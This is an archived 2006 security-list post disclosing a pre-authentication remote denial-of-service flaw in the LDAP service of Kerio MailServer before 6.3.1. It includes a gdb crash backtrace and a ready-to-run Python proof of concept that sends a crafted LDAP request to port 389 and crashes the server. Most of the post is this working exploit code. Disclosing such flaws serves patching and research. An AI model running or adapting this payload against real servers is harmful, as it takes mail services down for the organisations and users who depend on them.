Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15407
HistoryDec 15, 2006 - 12:00 a.m.

Kerio MailServer < 6.3.1 remote Denial of Service

2006-12-1500:00:00
vulners.com
13

Hi,

Kerio MailServer 6.3.1 changelog mentions the following bug fix:
'Fixed possible service stop when handling certain LDAP query'

It turns out that vd_kms6 vulnerability (which is a part of VulnDisco since Oct,
2006) has been fixed.

Below is a simple proof of concept code for this bug:

#!/usr/bin/env python

kms1.py - Kerio MailServer 6.2.2 preauth remote DoS

fixed in Kerio MailServer 6.3.1

Copyright (c) 2006 Evgeny Legerov

Permission to use, copy, modify, and distribute this software for any

purpose with or without fee is hereby granted, provided that the above

copyright notice and this permission notice appear in all copies.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES

WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF

MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR

ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES

WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN

ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF

OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""
gdb backtrace:

gdb -q ./mailserver core.18450

(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory…(no debugging
symbols found)…done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/ld-linux.so.2…(no debugging symbols found)…done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1 0x0821c387 in LDAPSearchRequest::setAll ()
#2 0x08093d8a in Ber::getSearchRequest ()
#3 0x08205e48 in LDAPServer::search ()
#4 0x08207de0 in LDAPServer::server ()
#5 0x08207e2e in ldap_handler ()
#6 0x0841be13 in KServerTask::handler ()
#7 0x082033c6 in KThreadPool::workerThread ()
#8 0x086ee7b6 in kerio::tiny::thread ()
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:
mov (%eax),%edx
(gdb) i r eax
eax 0x449 1097
"""

from socket import *

host = "localhost"
port = 389

s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += "\x20\x30\x82\x04\x1c"
s += "\x01"*1024
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += "\x00"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sock.sendall(s)
sock.recv(10000)
sock.close()

Regards,
-Evgeny